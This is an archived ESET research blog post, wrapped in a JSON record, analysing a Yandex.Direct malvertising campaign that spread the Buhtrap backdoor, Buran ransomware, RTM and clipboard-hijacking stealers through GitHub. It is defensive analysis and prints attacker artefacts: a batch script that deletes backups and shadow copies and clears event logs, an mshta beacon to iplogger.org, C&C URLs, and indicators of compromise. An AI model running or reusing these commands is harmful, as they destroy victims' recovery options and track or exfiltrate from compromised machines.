{ "id": "609aec1c-f39b-4981-b7d0-233fd3badfdd", "created_at": "2026-04-06T00:19:33.262903Z", "updated_at": "2026-04-10T03:37:09.013245Z", "deleted_at": null, "sha1_hash": "d29c2b564287bab988ac4062aa3a61beb116e6cf", "title": "Buhtrap backdoor and Buran ransomware distributed via major advertising platform", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 626943, "plain_text": "Buhtrap backdoor and Buran ransomware distributed via major\r\nadvertising platform\r\nBy ESET Research\r\nArchived: 2026-04-05 14:59:50 UTC\r\nUPDATE (November 6, 2019): Although the ransomware distributed in this campaign exhibits links with other\r\nBuhtrap malware, we now believe that it is not linked with the original Buhtrap group. Therefore, we have decided to\r\nchange our original detection name for this ransomware to Win32/Filecoder.Buran. This should minimize any\r\nadditional confusion and be more in sync with other publications describing the same ransomware.\r\nWhat better way to target accountants than to target them as they search the web, looking for documents pertinent to\r\ntheir job? This is just what has been happening for the past few months, where a group using two well-known\r\nbackdoors — Buhtrap and RTM — as well as ransomware and cryptocurrency stealers, has targeted organizations,\r\nmainly in Russia. The targeting was made possible by posting malicious ads through Yandex.Direct, in an attempt to\r\nredirect a potential target to a website offering malicious downloads disguised as document templates. Yandex is\r\nknown to be the largest search engine on the internet in Russia. Yandex.Direct is its online advertising network.\r\nWe’ve contacted Yandex and they removed this malvertising campaign.\r\nWhile the Buhtrap backdoor source code has been leaked in the past and can thus be used by anyone, RTM code has\r\nnot, at least to our knowledge. In this blog, we will describe how the threat actors distributed their malware by\r\nabusing Yandex.Direct and hosted it on GitHub. We will conclude with a technical analysis of the malware used.\r\nDistribution mechanism and victims\r\nThe link that ties the different payloads together is how they were distributed: all malicious files created by the\r\ncybercriminals were hosted on two different GitHub repositories.\r\nThere was usually only one malicious file downloadable from the repo, but it would change frequently. Since change\r\nhistory is available from the GitHub repository, it allows us to know which malware was distributed at any given\r\ntime. One way victims would be lured into downloading these malicious files was through a website, blanki-shabloni24[.]ru, as shown in Figure 1.\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 1 of 26\n\nFigure 1. Landing page of blanki-shabloni24[.]ru\r\n \r\nThe website design as well as all malicious filenames were quite revealing: they were all about forms, templates and\r\ncontracts. The fake software name translates to: “Collection of Templates 2018: forms, templates, contracts,\r\nsamples”. Given the fact that Buhtrap and RTM have been used in the past to target accounting departments, we\r\nimmediately believed that a similar strategy was at play. But how were potential victims directed to the website?\r\nInfection campaigns\r\nAt least some of the potential victims who ended up on this website were lured there through malvertising. Below you\r\ncan see an example of a redirect URL to the malicious website:\r\nhttps://blanki-shabloni24.ru/?utm_source=yandex\u0026utm_medium=banner\u0026utm_campaign=cid|\r\n{blanki_rsya}|context\u0026utm_content=gid|3590756360|aid|6683792549|15114654950_\u0026utm_term=скачать бланк\r\nсчета\u0026pm_source=bb.f2.kz\u0026pm_block=none\u0026pm_position=0\u0026yclid=1029648968001296456\r\nWe can see in the URL that a banner ad was posted on bb.f2[.]kz, which is a legitimate accounting forum. It is\r\nimportant to note here that these banners appeared on several different websites, all with the same campaign id\r\n(blanki_rsya) and most of them related to accounting or legal aid services. From the URL, we can also see what the\r\nuser was searching for – “скачать бланк счета” or “download invoice template” - reinforcing our hypothesis that\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 2 of 26\n\norganizations are targeted. A list of the websites where the banners and the related search term appeared is shown in\r\nTable 1.\r\nSearch term RU\r\nSearch term EN (Google\r\nTranslate)\r\nDomain\r\nскачать бланк счета download invoice template bb.f2[.]kz\r\nобразец договора contract example Ipopen[.]ru\r\nзаявление жалоба образец claim complaint example 77metrov[.]ru\r\nбланк договора contract form\r\nblank-dogovor-kupli-prodazhi[.]ru\r\nсудебное ходатайство образец judicial petition example zen.yandex[.]ru\r\nобразец жалобы example complaint yurday[.]ru\r\nобразцы бланков договоров example contract forms Regforum[.]ru\r\nбланк договора contract form assistentus[.]ru\r\nобразец договора квартиры example apartment contract napravah[.]com\r\nобразцы юридических\r\nдоговоров\r\nexamples of legal contracts avito[.]ru\r\nTable 1. Search terms used and domains where the banners were displayed\r\nThe blanki-shabloni24[.]ru website was probably set up in this way to survive basic scrutiny. An ad pointing to a\r\nprofessional-looking website with a link to GitHub is not something obviously bad. Moreover, the cybercriminals put\r\nthe malicious files on their GitHub repository only for a limited period of time, probably while the ad campaign was\r\nactive. Most of the time, the payload on GitHub was an empty zip file or a clean executable. To summarize, the\r\ncybercriminals were able to distribute ads through the Yandex.Direct service to websites that were likely to be visited\r\nby accountants searching for specific terms.\r\nLet’s now take a look at the different payloads that were distributed this way.\r\nPayload Analysis\r\nDistribution timeline\r\nThis malware campaign started in late October 2018 and is still active at time of writing. Since the whole repository\r\nwas publicly available on GitHub, we were able to draw a precise timeline of the malware families distributed (see\r\nFigure 2). We’ve observed six different malware families being hosted on GitHub over this period. We’ve added a\r\nline that illustrates when the banner links were seen, based on ESET telemetry, to compare it with the git history. We\r\ncan see that it correlates pretty well with the moments the payloads were available on GitHub. The discrepancy at the\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 3 of 26\n\nend of February may be explained by the possibility that we lack some of the history because the repository was\r\nremoved from GitHub before we were able to fetch all of it.\r\nFigure 2. Timeline of the malware distribution\r\nCode-signing certificates\r\nMultiple code-signing certificates were used to sign malware distributed during this campaign. Some of the\r\ncertificates were used to sign more than one malware family, an additional indicator linking the various malware\r\nsamples to the same campaign. The operators did not systematically sign the binaries they pushed to the git\r\nrepository. It is surprising, given that they had access to the private key of these certificates, that they didn’t use it for\r\nall of them. At the end of February 2019, the operators also started to make invalid signatures with a certificate\r\nbelonging to Google for which they do not possess the private key.\r\nAll the certificates involved in this campaign, and the malware families that they signed, are displayed in Table 2.\r\nCert’s CN Thumbprint\r\nSigned malware\r\nfamily\r\nTOV TEMA LLC 775E9905489B5BB4296D1AD85F3E45BC936E7FDC Win32/ClipBanker\r\nTOV \"MARIYA\" EE6FAF6FD2888A6D11DD710B586B78E794FC74FC Win32/ClipBanker\r\n\"VERY EXCLUSIVE\r\nLTD\"\r\nBD129D61914D3A6B5F4B634976E864C91B6DBC8E Win32/Spy.Buhtrap\r\n\"VERY EXCLUSIVE\r\nLTD.\"\r\n764F182C1F46B380249CAFB8BA3E7487FAF21E2A Win32/Filecoder.Buran\r\nTRAHELEN LIMITED 7C1D7CE90000B0E603362F294BC4A85679E38439 Win32/Spy.RTM\r\nLEDI, TOV 15FEA3B0B839A58AABC6A604F4831B07097C8018 Win32/Filecoder.Buran\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 4 of 26\n\nCert’s CN Thumbprint\r\nSigned malware\r\nfamily\r\nGoogle Inc 1A6AC0549A4A44264DEB6FF003391DA2F285B19F\r\nWin32/Filecoder.Buran\r\nMSIL/ClipBanker\r\nTable 2. List of certificates and malware signed by them\r\nWe also used these code-signing certificates to see if we could establish links with other malware families. For most\r\nof the certificates, we didn’t find malware that wasn’t distributed via the GitHub repository. However, in the case of\r\nthe TOV “MARIYA” certificate, it was used to sign malware belonging to the Wauchos botnet as well as some\r\nadware and coin miners. It is very unlikely that these malware variants were linked to the campaign we analyzed. It is\r\nprobable that the certificate involved was bought on some online black market.\r\nWin32/Filecoder.Buran\r\nThe component that first attracted our attention is the previously unseen Win32/Filecoder.Buran. It is a Delphi binary\r\nthat sometimes comes packed. It was mainly distributed during February and March of 2019. It implements the\r\nexpected behavior of ransomware, discovering local drives and network shares and encrypting files found on these\r\ndevices. It doesn’t require an internet connection to encrypt its victims’ files, since it doesn’t communicate with a\r\nserver to send the encryption keys. Instead, it appends a “token” at the end of the ransom message and demands that\r\nthe victims communicate with the operators via email or Bitmessage. The ransom note may be found in Appendix A.\r\nTo encrypt as many important resources as possible, Filecoder.Buran starts a thread dedicated to killing key software\r\nthat might have open handles on files containing valuable data, thus preventing them being encrypted. The targeted\r\nprocesses are mainly database management systems (DBMS). Furthermore, Filecoder.Buran removes log files and\r\nbackups, to make it as difficult as possible for victims without any offline backups to recover their files. To do so, the\r\nbatch script in Figure 3 is executed.\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\nbcdedit /set {default} recoveryenabled no\r\nwbadmin delete catalog -quiet\r\nwbadmin delete systemstatebackup\r\nwbadmin delete systemstatebackup -keepversions:0\r\nwbadmin delete backup\r\nwmic shadowcopy delete\r\nvssadmin delete shadows /all /quiet\r\nreg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f\r\nreg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f\r\nreg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"\r\nattrib \"%userprofile%\\documents\\Default.rdp\" -s -h\r\ndel \"%userprofile%\\documents\\Default.rdp\"\r\nwevtutil.exe clear-log Application\r\nwevtutil.exe clear-log Security\r\nwevtutil.exe clear-log System\r\nsc config eventlog start=disabled\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 5 of 26\n\nFigure 3. Script to remove backups and log files\r\nFilecoder.Buran uses the legitimate online service IP Logger, which is designed to gather information about who is\r\nvisiting a website. This is used to keep track of the ransomware’s victims. The command line in Figure 4 is\r\nresponsible for this.\r\nmshta.exe \"javascript:document.write('\u003cimg\r\nsrc=\\'https://iplogger.org/173Es7.txt\\'\u003e\u003cscript\u003esetInterval(function(){close();},10000);\u003c/script\u003e');\"\r\nFigure 4. Query to iplogger.org\r\nFiles that are encrypted are chosen based on failing to match three exclusion lists. First, it does not encrypt files with\r\nthe following extensions: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys and .bat. Second, all\r\nfiles for which the full path contains one of the directory strings listed in Figure 5 are excluded.\r\n\\.{ED7BA470-8E54-465E-825C-99712043E01C}\\\r\n\\tor browser\\\r\n\\opera\\\r\n\\opera software\\\r\n\\mozilla\\\r\n\\mozilla firefox\\\r\n\\internet explorer\\\r\n\\google\\chrome\\\r\n\\google\\\r\n\\boot\\\r\n\\application data\\\r\n\\apple computer\\safari\\\r\n\\appdata\\\r\n\\all users\\\r\n:\\windows\\\r\n:\\system volume information\\\r\n:\\nvidia\\\r\n:\\intel\\\r\nFigure 5. Directories excluded from encryption\r\nAnd third, specific filenames are excluded from encryption, among them the filename of the ransom note. Figure 6\r\nshows this list. Combined, these exclusions are clearly intended to leave an encrypted victim machine bootable, and\r\nminimally usable.\r\nboot.ini\r\nbootfont.bin\r\nbootsect.bak\r\ndesktop.ini\r\niconcache.db\r\nntdetect.com\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 6 of 26\n\nntldr\r\nntuser.dat\r\nntuser.dat.log\r\nntuser.ini\r\nthumbs.db\r\nwinupas.exe\r\nyour files are now encrypted.txt\r\nwindows update assistant.lnk\r\nmaster.exe\r\nunlock.exe\r\nunlocker.exe\r\nFigure 6. Files excluded from encryption\r\nFile encryption scheme\r\nWhen the malware is launched, it generates a 512-bit RSA key pair. The private exponent (d) and the modulus (n) are\r\nthen encrypted using a hardcoded 2048-bit public key (public exponent and modulus), zlib compressed and base64\r\nencoded. The code responsible for this is shown in Figure 7.\r\nFigure 7. Hex-Rays decompiler output of the 512-bit RSA key pair generation routine\r\nFigure 8 shows an example of the plaintext version of the generated private key that constitutes the token appended to\r\nthe ransom note.\r\n\u003cN\u003eDF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B23\r\nFigure 8. Example of a generated private key\r\nThe attacker’s public key is shown in Figure 9.\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 7 of 26\n\ne =\r\n0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C65\r\nn =\r\n0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746\r\nFigure 9. Hardcoded RSA public key\r\nThe files are encrypted using AES-128-CBC with a 256-bit key. For each file to be encrypted, a new key and a new\r\ninitialization vector are generated. The key information is appended to the end of the encrypted file. Let’s examine the\r\nformat of an encrypted file.\r\nEncrypted files have the following header:\r\nMagic Header Encrypted Size Decrypted size Encrypted data\r\n0x56 0x1A uint64_t uint64_t encrypt('VEGA' + filedata[:0x5000])\r\nThe data from the original file prepended with the magic value “VEGA” is encrypted up to the first 0x5000 bytes. All\r\nthe information necessary to decrypt the file is appended to the file with this structure:\r\nFile size\r\nmarker\r\nSize of AES key\r\nblob\r\nAES key\r\nblob\r\nSize of RSA key\r\nblob\r\nRSA key\r\nblob\r\nOffset to File size\r\nmarker\r\n0x01 or 0x02 uint32_t uint32_t uint32_t\r\nFile size marker contains a flag that indicates if the file size is \u003e 0x5000 bytes\r\nAES key blob = ZlibCompress(RSAEncrypt(AES Key + IV, generated RSA key pair's public key))\r\nRSA key blob = ZlibCompress(RSAEncrypt(Generated RSA private key, Hardcoded RSA public key))\r\nWin32/ClipBanker\r\nWin32/ClipBanker is a component that was distributed intermittently from the end of October to early December\r\n2018. Its role is to monitor the content of the clipboard, looking for cryptocurrency addresses. If a targeted\r\ncryptocurrency address is found, it is replaced by an address presumably belonging to the malware operator. The\r\nsamples we looked at are not packed, nor obfuscated. The only mechanism used to hide its behavior is string\r\nencryption. The operators’ cryptocurrency addresses are encrypted using RC4. Various cryptocurrencies are targeted\r\nsuch as Bitcoin, Bitcoin cash, Dogecoin, Ethereum and Ripple.\r\nA very negligible amount of BTC was sent to the attacker’s Bitcoin addresses during the time of distribution, which\r\nsuggests the campaign wasn’t very successful. Additionally, there is no way to be sure that these transactions are\r\nrelated to this malware.\r\nWin32/RTM\r\nWin32/RTM is a component that was distributed during a few days at the beginning of March 2019. RTM is a\r\nbanking trojan written in Delphi that targets remote banking systems. Back in 2017, ESET researchers published a\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 8 of 26\n\nwhite paper that contains an extensive analysis of this malware. As little has changed since then, we suggest the\r\ninterested reader should refer to that publication for more details. In January 2019, Palo Alto Networks also released a\r\nblogpost about this malware.\r\nBuhtrap downloader\r\nFor a short period of time, the package available from GitHub was a downloader that shared no resemblance with past\r\nBuhtrap tooling. This downloader reaches out to https://94.100.18[.]67/RSS.php?\u003csome_id\u003e to get the next stage and\r\nload it directly in memory. We identified two different behaviors for this second stage code. In one, the RSS.php URL\r\nserved the Buhtrap backdoor directly. This backdoor is very similar to the one available through the leaked source\r\ncode.\r\nOf interest here is that we see several different campaigns using the Buhtrap backdoor, presumably coming from\r\ndifferent actors. The main differences in this case are that, first, the backdoor is loaded directly in memory, not using\r\nthe usual DLL side-loading trick documented in our previous blog, and second, they changed the RC4 key used to\r\nencrypt network traffic to the C\u0026C server. Most of the campaigns we see in the wild do not even bother to change\r\nthis key.\r\nIn the other, more intricate, case we’ve seen, the RSS.php URL served another downloader. This downloader\r\nimplements some obfuscation such as dynamic import table reconstruction. The ultimate goal of this downloader is to\r\ncontact a C\u0026C server at https://msiofficeupd[.]com/api/F27F84EDA4D13B15/2 to send logs and wait for a response.\r\nIt treats the latter as a binary blob, loads it in memory and executes it. The payload we’ve seen this downloader\r\nexecute was the same Buhtrap backdoor described above, but other payloads may exist.\r\nAndroid/Spy.Banker\r\nInterestingly, an Android component was also found on the GitHub repository. It was only on the master branch for\r\none day on November 1st 2018. Apart from the fact that is was hosted on GitHub on that day, ESET telemetry shows\r\nno evidence of active distribution of this malware.\r\nThe Android component was hosted on GitHub as an Android Application Package (APK). It is heavily obfuscated.\r\nThe malicious behavior is concealed in an encrypted JAR located in the APK. It is encrypted with RC4 using this\r\nkey:\r\nkey = [\r\n0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,\r\n0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,\r\n0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96\r\n]\r\nThe same key and algorithm are used to encrypt the strings. The JAR is located under APK_ROOT + image/files. The\r\nfirst 4 bytes of the file contain the length of the encrypted JAR, which begins immediately after the length field.\r\nOnce we decrypted the file, it became obvious that it was Anubis, an already documented Android Banker. This\r\nmalware has the following capabilities:\r\nRecord microphone\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 9 of 26\n\nTake screenshot\r\nGet GPS position\r\nLog keystrokes\r\nEncrypt device data and demand ransom\r\nSend spam\r\nThe C\u0026C servers are:\r\nsositehuypidarasi[.]com\r\nktosdelaetskrintotpidor[.]com\r\nInterestingly, it used Twitter as a fallback communication channel to retrieve another C\u0026C server. The Twitter\r\naccount used by the sample we analyzed is @JohnesTrader, but this account was already suspended at time of\r\nanalysis.\r\nThe malware contains a list of targeted applications on the Android device. This list seems to be longer than what it\r\nwas back when Sophos researchers analyzed it. It targets a lot of banking applications for banks from all over the\r\nworld, some e-shopping apps like Amazon and eBay and cryptocurrency apps. We have included the full list in\r\nAppendix B.\r\nMSIL/ClipBanker.IH\r\nThe latest component to be distributed during the campaign covered in this blogpost is a .NET Windows executable\r\nwhich was distributed in March 2019. Most of the versions we looked at were packed with ConfuserEx v1.0.0. As\r\nwith the ClipBanker variant described above, this component also hijacks the clipboard. It targets a wide range of\r\ncryptocurrencies as well as Steam trade offers. Furthermore, it uses the IP Logger service to exfiltrate Bitcoin’s WIF\r\nprivate key.\r\nDefensive mechanisms\r\nIn addition to benefiting from ConfuserEx’s anti-debugging, anti-dumping and anti-tampering mechanisms, this\r\nmalware implements detection routines for security products and virtual machines.\r\nTo check if it is running in a virtual machine, it uses Windows’ built-in WMI command-line (WMIC) to query\r\ninformation about the BIOS – specifically:\r\nwmic bios\r\nIt then parses the output of the command looking for these specific keywords: VBOX, VirtualBox, XEN, qemu,\r\nbochs, VM.\r\nTo detect security products, the malware sends a Windows Management Instrumentation (WMI) query to Windows\r\nSecurity Center using the ManagementObjectSearcher API as shown in Figure 10. Once base64-decoded, the call is:\r\nManagementObjectSearcher('root\\\\SecurityCenter2', 'SELECT * FROM AntivirusProduct')\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 10 of 26\n\nFigure 10. Security product detection routine\r\nFurthermore, the malware checks whether CryptoClipWatcher, a defensive tool designed to protect users from\r\nclipboard hijacking, is running and if so, suspends all the threads of this process  - thus disabling the protection.\r\nPersistence\r\nIn the version we analyzed, the malware copies itself into %APPDATA%\\google\\updater.exe and sets the hidden flag\r\non the google directory. Then, it modifies the Windows Registry’s Software\\Microsoft\\Windows\r\nNT\\CurrentVersion\\Winlogon\\shell value and appends the path of updater.exe. Hence, every time a user logs in, the\r\nmalware is executed.\r\nMalicious behavior\r\nAs was the case with the previous ClipBanker we analyzed, this .NET malware monitors the content of the clipboard,\r\nlooking for cryptocurrency addresses - and if one is found, it is replaced with one of the operator’s addresses. Figure\r\n11 displays a list of the targeted addresses based on an enum found within the code.\r\nBTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR,\r\nFigure 11. Enum symbol for supported address types\r\nFor each of these address types there is an associated regular expression. The STEAM_URL value is for hijacking\r\nSteam’s trade offer system, as we can see in the regular expression used to detect it in the clipboard:\r\n\\b(https:\\/\\/|http:\\/\\/|)steamcommunity\\.com\\/tradeoffer\\/new\\/\\?partner=[0-9]+\u0026token=[a-zA-Z0-9]+\\b\r\nExfiltration channel\r\nIn addition to replacing addresses in the clipboard, this .NET malware also targets Bitcoin WIF private keys, Bitcoin\r\nCore wallets and Electrum Bitcoin wallets. The malware uses iplogger.org as an exfiltration channel to capture the\r\nWIF private key. To do so, the operators add the private key data in the User-Agent HTTP header as shown in Figure\r\n12.\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 11 of 26\n\nFigure 12. IP Logger console with exfiltrated data\r\nAs for the exfiltration of the wallets, the operators did not use iplogger.org; the limitation of 255 characters in the\r\nUser-Agent field displayed in IP Logger’s web interface might explain why they opted for another method. In the\r\nsamples we analyzed, the other exfiltration server was stored in the environment variable DiscordWebHook. What’s\r\npuzzling to us is that this environment variable is never set anywhere in the code. This seems to suggest that the\r\nmalware is still under development and that this variable is set on the operators’ test machines.\r\nThere is another indicator that the malware is still under development. The binary includes two iplogger.org URLs,\r\nand both are queried upon exfiltration. In the request to one of these URLs, the value in the Referer field is prepended\r\nby “DEV /”. We also found a version of the malware that wasn’t packed with ConfuserEx and the getter for this URL\r\nis called DevFeedbackUrl. Based on the name of the environment variable, we believe the operators are planning on\r\nusing the legitimate service Discord and abuse its webhook system to exfiltrate cryptocurrency wallets.\r\nConclusion\r\nThis campaign is a good example of how legitimate ad services can be abused to distribute malware. While this\r\ncampaign specifically targets Russian organizations, we wouldn’t be surprised if such a scheme were used abusing\r\nnon-Russian ad services. To avoid being caught by such a scam, users should always make sure the source from\r\nwhere they download software is a well-known, reputable software distributor.\r\nIndicators of Compromise (IoCs)\r\nList of samples\r\nSHA-1 Filename ESET Detection Name\r\n79B6EC126818A396BFF8AD438DB46EBF8D1715A1 hashfish.exe Win32/ClipBanker.HM\r\n11434828915749E591254BA9F52669ADE580E5A6 hashfish.apk Android/Spy.Banker.KW\r\nBC3EE8C27E72CCE9DB4E2F3901B96E32C8FC5088 hashfish.exe Win32/ClipBanker.HM\r\nCAF8ED9101D822B593F5AF8EDCC452DD9183EB1D btctradebot.exe Win32/ClipBanker.HM\r\nB2A1A7B3D4A9AED983B39B28305DD19C8B0B2C20 blanki.exe Win32/ClipBanker.HM\r\n1783F715F41A32DAC0BAFBBDF70363EC24AC2E37 blanki.exe Win32/Spy.Buhtrap.AE\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 12 of 26\n\nSHA-1 Filename ESET Detection Name\r\n291773D831E7DEE5D2E64B2D985DBD24371D2774 blanki.exe Win32/Spy.Buhtrap.AE\r\n4ADD8DCF883B1DFC50F9257302D19442F6639AE3 masterblankov24.exe Win32/Spy.Buhtrap.AG\r\n790ADB5AA4221D60590655050D0FBEB6AC634A20 masterblankov24.exe Win32/Filecoder.Buran.A\r\nE72FAC43FF80BC0B7D39EEB545E6732DCBADBE22 vseblanki24.exe Win32/Filecoder.Buran.B\r\nB45A6F02891AA4D7F80520C0A2777E1A5F527C4D vseblanki24.exe Win32/Filecoder.Buran.C\r\n0C1665183FF1E4496F84E616EF377A5B88C0AB56 vseblanki24.exe Win32/Filecoder.Buran.C\r\n81A89F5597693CA85D21CD440E5EEAF6DE3A22E6 vseblanki24.exe Win32/Spy.RTM.W\r\nFAF3F379EB7EB969880AB044003537C3FB92464C vseblanki24.exe Win32/Spy.RTM.W\r\n81C7A225F4CF9FE117B02B13A0A1112C8FB3F87E master-blankov24.exe Win32/Filecoder.Buran.B\r\nED2BED87186B9E117576D861B5386447B83691F2 blanki.exe Win32/Filecoder.Buran.B\r\n6C2676301A6630DA2A3A56ACC12D66E0D65BCF85 blanki.exe Win32/Filecoder.Buran.B\r\n4B8A445C9F4A8EA24F42B9F80EA9A5E7E82725EF mir_vseh_blankov_24.exe Win32/Filecoder.Buran.B\r\nA390D13AFBEFD352D2351172301F672FCA2A73E1 master_blankov_300.exe Win32/Filecoder.Buran.B\r\n1282711DED9DB140EBCED7B2872121EE18595C9B sbornik_dokumentov.exe Win32/Filecoder.Buran.B\r\n372B4458D274A6085D3D52BA9BE4E0F3E84F9623 sbornik_dokumentov.exe MSIL/ClipBanker.IH\r\n9DE1F602195F6109464B1A7DEAA2913D2C803362 nike.exe MSIL/ClipBanker.IH\r\nList of servers\r\nDomain IP Address Malware family\r\nsositehuypidarasi[.]com 212.227.20[.]93, 87.106.18[.]146 Android/Spy.Banker\r\nktosdelaetskrintotpidor[.]com 87.106.18[.]146 Android/Spy.Banker\r\n94.100.18[.]67 Win32/RTM\r\nstat-counter-7-1[.]bit 176.223.165[.]112 Win32/RTM\r\nstat-counter-7-2[.]bit 95.211.214[.]14 Win32/RTM\r\nblanki-shabloni24[.]ru 37.1.221[.]248, 5.45.71[.]239\r\nSuperjob[.]icu 185.248.103[.]74 Win32/Buhtrap\r\nMedialeaks[.]icu 185.248.103[.]74 Win32/Buhtrap\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 13 of 26\n\nDomain IP Address Malware family\r\nicq.chatovod[.]info 185.142.236[.]220 Win32/Buhtrap\r\nwomens-history[.]me 185.142.236[.]242 Win32/Buhtrap\r\nMITRE ATT\u0026CK techniques\r\nWin32/Filecoder.Buran\r\nTactic ID Name Description\r\nExecution T1204 User execution\r\nThe user must run the\r\nexecutable\r\nDefense\r\nevasion\r\nT1116 Code signing\r\nSome of the samples are\r\nsigned\r\nT1140\r\nDeobfuscate/Decode Files or\r\nInformation\r\nThe strings are encrypted\r\nusing RC4\r\nDiscovery T1083 File and Directory Discovery\r\nFiles and Directories are\r\ndiscovered for encryption\r\nT1135\r\nNetwork Share\r\nDiscovery\r\nThe network shares are discovered to\r\nfind more files to encrypt\r\nWin32/ClipBanker\r\nTactic ID Name Description\r\nExecution T1204 User execution\r\nThe user must run the\r\nexecutable\r\nDefense\r\nevasion\r\nT1116 Code signing\r\nSome of the samples\r\nare signed\r\nT1140\r\nDeobfuscate/Decode Files or\r\nInformation\r\nThe cryptocurrency addresses are\r\nencrypted using RC4\r\nMSIL/ClipBanker\r\nTactic ID Name Description\r\nExecution T1204 User execution The user must run the executable\r\nPersistence T1004 Winlogon Helper DLL\r\nPersistence is achieved by altering\r\nthe Winlogon\\shell key\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 14 of 26\n\nTactic ID Name Description\r\nDefense\r\nevasion\r\nT1116 Code signing Some of the samples are signed\r\nT1140\r\nDeobfuscate/Decode Files or\r\nInformation\r\nThe strings are encrypted using a\r\nstatic XOR key\r\nT1158 Hidden Files and Directories\r\nThe executable used for persistence\r\nis in a newly created hidden\r\ndirectory\r\nDiscovery T1083 File and Directory Discovery\r\nLook for specific folders to find\r\nwallet application storage\r\nCollection T1115 Clipboard Data\r\nBitcoin WIF private key is stolen\r\nfrom the clipboard data\r\nExfiltration\r\nT1020 Automated Exfiltration\r\nCrypto wallet software’s storage is\r\nautomatically exfiltrated\r\nT1041\r\nExfiltration Over Command\r\nand Control Channel\r\nExfiltrated data is sent to a server\r\nCommand and\r\nControl\r\nT1102 Web Service\r\nUses IP Logger legitimate service\r\nto exfiltrate Bitcoin WIF private\r\nkeys\r\nT1043\r\nCommonly Used\r\nPort\r\nCommunicates with a server\r\nusing HTTPS\r\nT1071\r\nStandard\r\nApplication Layer\r\nProtocol\r\nCommunicates with a server\r\nusing HTTPS\r\nBuhtrap downloader\r\nTactic ID Name Description\r\nExecution\r\nT1204 User execution\r\nThe user must run the\r\nexecutable\r\nT1106 Execution through API\r\nExecutes additional malware\r\nthrough CreateProcess\r\nDefense\r\nevasion\r\nT1116 Code signing\r\nSome of the samples are\r\nsigned\r\nCredential\r\nAccess\r\nT1056 Input Capture Backdoor contains a keylogger\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 15 of 26\n\nTactic ID Name Description\r\nT1111\r\nTwo-Factor Authentication\r\nInterception\r\nBackdoor actively searches for\r\na connected smart card\r\nCollection T1115 Clipboard Data\r\nBackdoor logs clipboard\r\ncontent\r\nExfiltration\r\nT1020 Automated Exfiltration\r\nLog files are automatically\r\nexfiltrated\r\nT1022 Data Encrypted Data sent to C\u0026C is encrypted\r\nT1041\r\nExfiltration Over Command and\r\nControl Channel\r\nExfiltrated data is sent to a\r\nserver\r\nCommand and\r\nControl\r\nT1043 Commonly Used Port\r\nCommunicates with a server\r\nusing HTTPS\r\nT1071\r\nStandard Application\r\nLayer Protocol\r\nHTTPS is used\r\nT1105 Remote File Copy\r\nBackdoor can download and\r\nexecute file from C\u0026C server\r\nAppendix A: Example of a ransom note\r\nOriginal version\r\nВНИМАНИЕ, ВАШИ ФАЙЛЫ ЗАШИФРОВАНЫ!\r\n \r\nВаши документы, фотографии, базы данных, сохранения в играх и другие\r\nважные данные были зашифрованы уникальным ключем, который находится\r\nтолько у нас. Для восстановления данных необходим дешифровщик.\r\n \r\nВосстановить файлы Вы можете, написав нам на почту:\r\ne-mail: sprosinas@cock.li\r\ne-mail: sprosinas2@protonmail.com\r\n \r\nПришлите Ваш идентификатор TOKEN и 1-2 файла, размером до 1 Мб каждый.\r\nМы их восстановим, в доказательство возможности расшифровки.\r\nПосле демонстрации вы получите инструкцию по оплате, а после оплаты\r\nВам будет отправлена программа-дешифратор, которая полностью восстановит\r\nвсе заблокированные файлы без потерь.\r\n \r\nЕсли связаться через почту не получается:\r\nПерейдите по ссылке: https://bitmessage.org/wiki/Main_Page и 